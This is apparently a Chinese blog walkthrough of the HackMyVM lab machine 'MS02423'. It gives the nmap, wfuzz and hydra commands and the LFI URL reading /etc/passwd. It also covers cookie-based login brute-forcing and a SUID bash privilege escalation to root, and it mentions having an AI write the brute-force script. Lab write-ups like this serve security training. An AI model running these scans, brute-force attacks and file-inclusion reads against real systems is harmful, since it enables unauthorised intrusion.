─$ nmap -p- --min-rate 10000 192.168.186.206
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-13 23:32 EDT
Nmap scan report for 192.168.186.206
Host is up (0.26s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
423/tcp open opc-job-start
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds
经过尝试,80与423均为网站
扫面80端口,发现了/robots.txt :
# =================================================================
# CTF CHALLENGE - ROBOTS.TXT
# =================================================================
User-agent: *
Disallow: /admin.txt
Disallow: /login.txt
Disallow: .config
Disallow: .backup
Disallow: .user.txt
Disallow: /wp-admin
经过尝试,.user.txt 有东西,且经过html编码,解码得到
admin
john
alice
sysadmin
ctf_player
<-----passwd top 500----->
五个用户,还给了密码的提示,passwd top 500,再网上搜索密码找到
https://github.com/insightglacier/Dictionary-Of-Pentesting/blob/master/Password/password-top1000.txt
没找到500的,找了个1000的
打开423网页,是个登录框,抓包发现用户名密码被加密到了cookie上
把423的网页源码给ai,写个爆破脚本,使用找到的用户名与密码
尝试后得到ctf_player:genesis
登录后,跳转到.hint.php,网页中心写着要wfuzz,那就尝试
wfuzz -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.186.206:423/.hint.php?FUZZ=../../../etc/passwd' -H "Cookie: PHPSESSID=im7v269fov7lbhmha4nv22f96d" --hh 1144
得到参数xfer,使用http://192.168.186.206:423/.hint.php?xfer=../../../etc/passwd
无回显,尝试其他的目录地址
http://192.168.186.206:423/.hint.php?xfer=/etc/passwd 会回显passwd
得到用户2022,MS02423
hydra爆破ssh,使用那1000个密码
2002:softball
ssh连接后,显示了bash-5.0#
根据多次suid位执行bash的经验,这是/bin/bash可直接执行的信号
-bash-5.0$ /bin/bash -p
bash-5.0# id
uid=1000(2002) gid=1000(2002) euid=0(root) egid=0(root) 组=0(root),1000(2002)
THIS OVER
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://sanopll.top/hmv-ms02423%e9%9d%b6%e6%9c%ba%e5%a4%8d%e7%9b%98/
共有 0 条评论